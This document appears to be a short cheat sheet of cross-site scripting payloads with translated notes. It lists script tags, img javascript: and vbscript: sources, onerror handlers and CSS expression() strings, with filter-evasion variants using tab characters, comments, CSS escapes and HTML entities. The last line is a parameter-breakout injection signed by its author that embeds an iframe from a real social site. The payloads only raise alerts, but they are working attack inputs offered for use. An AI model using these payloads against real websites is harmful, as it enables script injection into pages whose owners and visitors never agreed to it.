<script>alert("跨站")</script> (most commonly used)
<img src=javascript:alert("跨站")></img>
<img src="javascript: alert(/跨站/)"></img>
<img src="javas????cript:alert(/跨站/)" width=150></img> (the gap inside "javascript" is made of tab characters, shown here as ????)
<img src="#" onerror=alert(/跨站/)></img>
<img src="#" style="xss:expression(alert(/xss/));"></img>
<img src="#"/* */onerror=alert(/xss/) width=150></img> (/**/ is a comment)
<img src=vbscript:msgbox ("xss")></img>
<style> input {left:expression (alert('xss'))}</style>
<div style={left:expression (alert('xss'))}></div>
<div style={left:exp/* */ression (alert('xss'))}></div>
<div style={left:\0065\0078ression (alert('xss'))}></div>
HTML entity: <div style={left:&#x0065;xpression (alert('xss'))}></div>
Unicode: <div style="{left:expRessioN (alert('xss'))}">
"]}%3Cscript%3Ealert('By b14ckb0y')%3C/script%3E{[&item="]<iframe%20src=http://new.qzone.qq.com/9530772%20width=400%20height=600></iframe>["